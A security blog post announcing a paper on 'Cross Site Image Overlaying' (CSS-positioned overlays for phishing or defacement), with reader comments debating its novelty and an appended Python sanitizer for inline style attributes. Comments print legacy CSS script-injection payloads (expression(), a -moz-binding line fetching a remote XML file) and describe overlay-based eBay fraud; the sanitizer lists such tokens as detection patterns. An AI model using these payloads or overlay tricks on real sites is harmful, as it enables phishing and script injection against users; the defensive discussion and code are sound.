XSIO – Cross Site Image Overlaying

I finished this paper about one month ago but I had to clarify some stuff with my employer Dreamlab Technologies Ltd. Now everything’s clear and I can publish my paper about an attack type I call XSIO – Cross Site Image Overlaying. It’s about something which I think many of you have already done, but I wasn’t able to find anything written about it, and I don’t even think that most of you are aware of how big the impact of something like this could be. But just read the paper if you’re interested in hearing some more about it :)

Download – XSIO Paper


16 Comments to “XSIO – Cross Site Image Overlaying”

  1. Luke Welling

    I am glad somebody has given it a name.

    I have seen eBay scammers playing with this for a while. If you are running an advance fee fraud scam with eBay auctions as bait, you don’t really want people to waste time bidding on the items (that will probably get canceled before running to completion), you just want them to contact you so you can start talking them into sending you payment or a “deposit” or whatever. Therefore, you don’t need a sophisticated XSIO setup, just a big screen-sized one with a mailto.

    If eBay is still vulnerable, then you could run a more sophisticated one and make a fairly convincing phishing attack fairly easily, because eBay routinely asks users to reauthenticate during a session.

  2. nEUrOO

    You’re only talking about images, but you can use CSS and z-buffering to do the same thing with all divs/elements.
    I made a demo a long time ago about that (guess it’s the same vuln). In my case it was really special stuff, but I guess the philosophy is the same…

    http://rgaucher.info/b/index.php/post/2007/02/23/CSS-is-amphetamine-for-your-XSS-Injection

  3. Disenchant

    Hi nEUrOO,
    yes, I remember the blog posting you mention here :)

    I think it’s about the same basic idea of how to do something, but not about what to do with it. The possibility to set the position of an element on a website through CSS is nothing special at all, because every web developer does this today, but you used this for executing client side script code (which is a cool idea, by the way). The problem with your idea is that this will have no effect when a user has Javascript disabled, and because of such a situation I was looking for a way of doing stuff like defacements, disinformation or phishing, like described in the paper, without client side script code.

  4. nEUrOO

    Exactly, this was actually just an example of how to use CSS to do cool stuff, I really should dive into that more… CSS is so powerful :)
    I know that Gareth Heyes is also working in that direction…

    Anyway, as Luke said, it’s good that somebody gave that vuln a name :)

  5. sirdarckcat

    If you can modify the style elements of a website, you can do far more dangerous things than overlapping an image.. Come on, if we make “this” a type of attack, we will finish having thousands of bogus attacks based on non-dangerous features..
    Maybe you could use an animated gif for making the user think he is on another website, but.. anyway, this is not dangerous..

  6. Disenchant

    Hi sirdarckcat,
    can you give some examples of “far more dangerous things than overlapping an image” we can do, just using the style attribute?

    Of course you’re right on the point that there are many more things we should then probably give a name to (even if there are not thousands), but from my point of view this is needed. If we know what we’re talking about because of different names, it’s much easier to refer to something like this, or also to show people who aren’t security professionals what could be dangerous for them and how to protect against it.

  7. lake2

    yes, it’s a good idea

  8. Aks aka 0kn0ck

    hi dis

    The concept is good from the perspective of XSS injection through different vectors.
    Since your vector of discussion is very flexible to one point that is XSIO and your
    point is new as peer related layout. It’s very good. I will work on this aspect too.
    It’s good. Keep it up. Carry on.

  9. kuza55

    @Disenchant:
    I think sirdarckcat meant you could conduct XSS attacks via the style attribute, e.g.
    style="width: expression(alert('XSS'));"
    in IE6/7. Admittedly it doesn’t work in FF or Opera, but IE is still the biggest portion of the market, and the portion of the market most likely to get fooled by the attack in your paper.

  10. Disenchant

    Hi kuza55,
    it could be that sirdarckcat means this attack vector, but then we’re at the same point I already discussed above with nEUrOO. If you can execute client side script code, this is definitely the better way of doing an attack for defacements, disinformation or phishing than with an XSIO, but if Javascript is turned off, you need something else than this, and the alternative here is, for example, an XSIO.

    I would be really interested in an answer from sirdarckcat to hear more about the “far more dangerous things” he mentioned in his comment :)

  11. Daniel

    I really, really don’t think this can be classed as any new attack. We initially classed most of the XSS variants (and believe me, there are many) back in the OWASP Testing Guide version 1, which was 4 years ago now.

    What other dangerous methods did you find?

    Daniel
    OWASP

  12. Disenchant

    Hi Daniel,
    please don’t see this as an XSS variant! This is the big difference between XSS and XSIO: the first one needs the possibility to execute client side script code, but the second one just needs normal HTML, or to be more specific just CSS, because of the style attribute.

    And to answer your question, for this only the style attribute is relevant, because it’s about using CSS, and (AFAIK) no other methods have such possibilities.

  13. Daniel

    This falls into the simple category of input and output validation. There is no new method here, hell, I’ve been testing style variants for input since 2001; any application which does not check the correct data being sent, or received, is vulnerable to this style of injection testing.

    Not meaning to sound against you here, but this technique is very, very old and yes, you are right, we never did bother calling it anything as it happily fell into the injection suite of issues.

    If the application does not check all of the variables, of course you can do simple HTML references, as the developer has not expected that to happen, so what is new about what you have named it?

    Not a personal attack, just failing to see the “new” factor of something we have been testing for a long time.

  14. Disenchant

    Of course it’s about input and output validation, but for example SQLi is also just about this, so this is nothing we have to talk about from my point of view, because it’s not relevant here.

    I agree with you that using the style attribute for attacks is not new at all, but I’ve never seen someone doing the things described in the paper through it, and also, as I already wrote, I wasn’t able to find a paper, blog posting or anything on this. The interesting stuff here is not that you can do something evil through the style attribute, it’s about what we can do through it.

    PS: I don’t see your comments on this as a personal attack, it’s very helpful to me when I get feedback on my work. Thanks very much :)

  15. sirdarckcat

    As kuza55 said, I meant XSS, Firefox users are also vulnerable
    STYLE='-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")'
    just the 1% that use NoScript will be invulnerable.

  16. Disenchant

    Hi sirdarckcat,
    you’re right, most people will not have Javascript turned off, but isn’t it good to know of a way to perform an “attack” also without client side script code? Perhaps a combination of the XSS and the XSIO way would be interesting to catch 100% of all users :)
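The thread above identifies two ways a user-controlled `style` attribute goes wrong: positioning and stacking properties let an injected element cover the page (the overlay the paper describes, and nEUrOO's z-index variant for any element), and value-level vectors such as `expression()` (kuza55's comment) or `-moz-binding` (sirdarckcat's comment) turned CSS into script in older browsers. The Python below is an added example, not code from the paper, the blog or any of the commenters: an allowlist audit of an inline style attribute that reports both kinds of declaration and returns only the harmless ones. The property sets, the regular expressions and the sample style strings are constructed for this illustration and should be tuned to what an application's rich-text feature actually needs.

```python
import re
from typing import List, Tuple

# Constructed allowlist: properties that recolour or restyle text but cannot move,
# resize, hide or stack an element. Extend only with properties you have reviewed.
ALLOWED_PROPERTIES = {
    "color", "background-color", "font-weight", "font-style",
    "font-size", "text-align", "text-decoration",
}

# Properties that let an injected element be moved or stacked over other content,
# i.e. the ingredients of an image overlay (XSIO) or of a hidden element.
OVERLAY_PROPERTIES = {
    "position", "top", "left", "right", "bottom", "z-index", "float",
    "width", "height", "margin", "margin-top", "margin-left",
    "margin-right", "margin-bottom", "opacity", "display", "visibility",
    "clip", "transform",
}

# Tokens that historically executed script from CSS (expression(), -moz-binding,
# behavior) or pull in remote resources (url(), @import). Backslashes and '<'
# are rejected outright because they are used to obfuscate such tokens.
DANGEROUS_TOKEN = re.compile(
    r"expression\s*\(|-moz-binding|behavior|url\s*\(|javascript:|@import|\\|<",
    re.IGNORECASE,
)

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)

# Values on the allowlist are limited to keywords, numbers, units and hex colours.
SAFE_VALUE = re.compile(r"^[A-Za-z0-9#%.,\s-]+$")


def parse_declarations(style: str) -> List[Tuple[str, str]]:
    """Split an inline style string into (property, value) pairs.

    CSS comments are removed first so that 'exp/**/ression(' cannot hide a
    dangerous token from the checks that follow. The input is assumed to be
    already HTML-entity-decoded, as a browser would see it.
    """
    style = CSS_COMMENT.sub("", style)
    pairs = []
    for chunk in style.split(";"):
        if ":" not in chunk:
            continue
        prop, value = chunk.split(":", 1)
        pairs.append((prop.strip().lower(), value.strip()))
    return pairs


def audit_style(style: str) -> Tuple[List[Tuple[str, str]], List[Tuple[str, str, str]]]:
    """Return (kept, rejected); each rejected entry carries the reason it was dropped."""
    kept, rejected = [], []
    for prop, value in parse_declarations(style):
        if DANGEROUS_TOKEN.search(prop) or DANGEROUS_TOKEN.search(value):
            rejected.append((prop, value, "script-capable or remote value"))
        elif prop in OVERLAY_PROPERTIES:
            rejected.append((prop, value, "positioning/stacking property"))
        elif prop not in ALLOWED_PROPERTIES:
            rejected.append((prop, value, "property not on allowlist"))
        elif not SAFE_VALUE.match(value):
            rejected.append((prop, value, "unexpected characters in value"))
        else:
            kept.append((prop, value))
    return kept, rejected


def sanitize_style(style: str) -> str:
    """Rebuild the style attribute from the declarations that passed the audit."""
    kept, _ = audit_style(style)
    return "; ".join(f"{prop}: {value}" for prop, value in kept)


# Constructed sample inputs, one per case discussed in the thread.
SAMPLES = {
    "overlay": "position:absolute; top:0; left:0; width:100%; height:100%; z-index:9999",
    "expression": "width: expression(alert('XSS'))",
    "moz_binding": '-moz-binding:url("http://example.invalid/binding.xml#x")',  # placeholder URL
    "comment_trick": "width: exp/**/ression(alert(1))",
    "benign": "color: #c00; font-weight: bold",
}

if __name__ == "__main__":
    for name, style in SAMPLES.items():
        kept, rejected = audit_style(style)
        print(f"{name}: kept={kept}")
        for prop, value, reason in rejected:
            print(f"  rejected {prop}: {value!r} ({reason})")
```

The audit order matters: script-capable tokens are checked before the property name, so `width: expression(...)` is reported as a script vector rather than merely as a sizing property, which is the more useful signal in a log. Rejecting positioning properties wholesale is the simplest way to rule out the overlay; if an application genuinely needs some layout control, it should be granted per property with bounded values rather than by loosening the allowlist.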